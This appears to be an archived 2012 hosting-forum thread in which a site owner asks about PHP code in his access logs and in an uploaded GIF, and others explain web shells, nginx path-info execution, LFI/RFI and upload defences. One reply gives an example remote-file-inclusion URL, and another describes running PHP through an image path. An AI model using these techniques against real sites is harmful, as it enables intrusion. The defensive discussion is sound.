Portal Home > Knowledgebase > Articles Database > site been hacked, see strange in the log
site been hacked, see strange in the log
| Posted by heropage, 11-30-2012, 11:53 AM |
| what's this thing do?
I mean, this field should something like "Mozilla/5.0...", how come it can be a php codes
Last edited by heropage; 11-30-2012 at 11:57 AM.
|
| Posted by TravisT-[SSS], 11-30-2012, 12:11 PM |
| From the looks of it, they were trying to get a shell uploaded to your system or maybe that was their intent?. Why that is in the UA field I have no idea... I would just ensure the application is secure and won't allow files to be executed with .htaccess
|
| Posted by heropage, 11-30-2012, 12:21 PM |
| I have disabled php function system now.
what do you mean by
the hacker was able to upload a shell php script to one of my writable folder.
I am not sure how they did it.
But my site allow user to upload image file, the attachment is the gif file the hacker uploaded. Inside the gif file, they embed a php codes in it, but I am not sure how they can execute the php codes inside a gif file
Attached Thumbnails
|
| Posted by Ash, 11-30-2012, 12:47 PM |
| Often they don't, and rely on you to do it for them You need to look at securing the point where users upload images, with basic checks like getimagesize() an image file with PHP injected can still be seen as just an image.
Depending on how you then display the images, it'll be parsed as PHP and execute.
|
| Posted by heropage, 11-30-2012, 12:56 PM |
| I have disabled image upload for now.
my site displays image directly like
upload.mysite.com/photo/user.gif
But I have tried both on IE and FF, it looks like the php didn't get executed.
Could the hacker use something like mime type sniffing to get it executed.
|
| Posted by CoderJosh, 11-30-2012, 01:15 PM |
| See http://www.goitworld.com/nginx-php-f...vulnerability/ for an example (misconfigured nginx executing PHP code within an uploaded JPG image file in this case).
|
| Posted by heropage, 11-30-2012, 02:35 PM |
| Thank you very much.
I found my server has the exact issue.
I create a php file, then just rename to for example test.jpg,
then I run mysite.com/test.jpg/test.php, it's running the php codes!
This is scary!
BUT, the attachment I upload above (the gif file) is kind of different. it's not just a pure php file, it IS a picture with php codes embed in it. I open it on my site, but I did not see anything happen. Maybe the hacker has better way to do so?
|
| Posted by Kalriath, 11-30-2012, 09:43 PM |
| The hacker is probably hoping you have an insecure PHP webstats program that will simply pull the text out of the database and display (or execute) it. This way potentially that line could be run the next time you look at your web stats. I don't know of any vulnerable stats programs to such a basic security mistake, but that doesn't mean there isn't one.
|
| Posted by Moo-Josh, 12-01-2012, 06:54 AM |
| Might be worth doing a maldet scan incase the user has uploaded any malicious shells as well.. While maldet won't detect everything, it does a decent job!
|
| Posted by Server Management, 12-01-2012, 11:33 AM |
| Do you have any scanning solution installed on this server?
|
| Posted by nessic, 12-02-2012, 08:20 AM |
| The http header can be used to manipulate bad coding. Alot of image webhost's are suspectable to this type of attack which can allow a end user to use LFI/RFI hacks.
Google /proc/self/environ attack and you'll find alot of stuff regarding the type of attack you came under.
|
| Posted by khunj, 12-03-2012, 07:46 AM |
| They will not run it on your server, but will use it to hack another server via remote file inclusion ( e.g. http://victim.tld/index.php?var=http://yoursite.com/user.gif??] ).
|
| Posted by RRWH, 12-03-2012, 07:57 AM |
| I have a site where users can upload images and sometimes php shells slip thru. On the other side of the coin, they can never execute the php as I have the server configured to intercept all requests for images and only display it if it is an image.
Having protection on the way up is fine, but someone will always work out how to get past your measures, just make sure that you only output an image if that is what you expected.
|
| Posted by heropage, 12-04-2012, 12:17 PM |
| just found this, it's interesting!
http://kaoticcreations.blogspot.ca/2...ities-via.html
|
| Posted by whmcsguru, 12-04-2012, 01:46 PM |
| Any time you're storing things , or allowing them to be uploaded like this, you need to store those uploaded items in an off web directory (ie: /home/user/images, not /home/user/www/uploads). Make it more complicated for the hacker to actually do what they want to do.
|
Add to Favourites 
Print this Article
Also Read
EZPZ hosting (Views: 569)